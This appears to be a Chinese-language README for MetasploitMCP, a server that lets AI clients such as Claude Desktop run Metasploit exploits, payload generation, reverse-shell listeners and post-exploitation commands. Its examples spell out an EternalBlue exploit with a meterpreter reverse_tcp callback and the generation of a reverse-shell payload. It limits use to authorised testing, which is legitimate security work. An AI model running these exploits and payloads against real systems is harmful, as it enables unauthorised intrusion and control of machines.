MetasploitMCP

Metasploit MCP Server

项目描述

功能特性

模块信息

• list_exploits: 搜索并列出可用的 Metasploit 漏洞利用模块

• list_payloads: 搜索并列出可用的 Metasploit 载荷模块，支持按平台和架构进行过滤

漏洞利用工作流

• run_exploit: 配置并针对目标执行漏洞利用，支持先运行检查

• run_auxiliary_module: 使用自定义选项运行任何 Metasploit 辅助模块

• run_post_module: 针对现有会话执行后渗透模块

载荷生成

• generate_payload: 使用 Metasploit RPC 生成载荷文件（文件保存在本地）

会话管理

• list_active_sessions: 显示当前 Metasploit 会话及其详细信息

• send_session_command: 在活动的 shell 或 Meterpreter 会话中运行命令

• terminate_session: 强制终止活动会话

监听器管理

• list_listeners: 显示所有活动的监听器和后台任务

• start_listener: 创建新的 multi/handler 以接收连接

• stop_job: 终止任何正在运行的任务或监听器

环境要求

• 已安装 Metasploit Framework 并运行 msfrpcd

• Python 3.10 或更高版本

• 所需的 Python 包（参见 requirements.txt）

安装步骤

1. 克隆本仓库

2. 安装依赖：

3. 配置环境变量（可选）：

使用方法

传输选项

• HTTP/SSE (Server-Sent Events): 默认模式，适用于大多数 MCP 客户端

• STDIO (Standard Input/Output): 用于 Claude Desktop 等直接管道连接

Claude Desktop 集成

其他 MCP 客户端

1. 以 HTTP 模式启动服务器：

2. 配置您的 MCP 客户端连接到：
• SSE 端点: http://your-server-ip:8085/sse

安全注意事项

• 始终在执行前验证和审查所有命令

• 仅在隔离的测试环境或获得适当授权的情况下运行

• 注意后渗透命令可能导致系统发生重大修改

示例工作流

基本漏洞利用

1. 列出可用漏洞利用模块：list_exploits("ms17_010")

2. 选择并运行漏洞利用：run_exploit("exploit/windows/smb/ms17_010_eternalblue", {"RHOSTS": "192.168.1.100"}, "windows/x64/meterpreter/reverse_tcp", {"LHOST": "192.168.1.10", "LPORT": 4444})

3. 列出会话：list_active_sessions()

4. 运行命令：send_session_command(1, "whoami")

后渗透

1. 运行后渗透模块：run_post_module("windows/gather/enum_logged_on_users", 1)

2. 发送自定义命令：send_session_command(1, "sysinfo")

3. 完成后终止会话：terminate_session(1)

监听器管理

1. 启动监听器：start_listener("windows/meterpreter/reverse_tcp", "192.168.1.10", 4444)

2. 列出活动监听器：list_listeners()

3. 生成载荷：generate_payload("windows/meterpreter/reverse_tcp", "exe", {"LHOST": "192.168.1.10", "LPORT": 4444})

4. 停止监听器：stop_job(1)

配置选项

载荷保存目录

• Windows (PowerShell):

• Windows (Command Prompt):

• Linux/macOS:

• 在 Claude Desktop 配置中:

许可证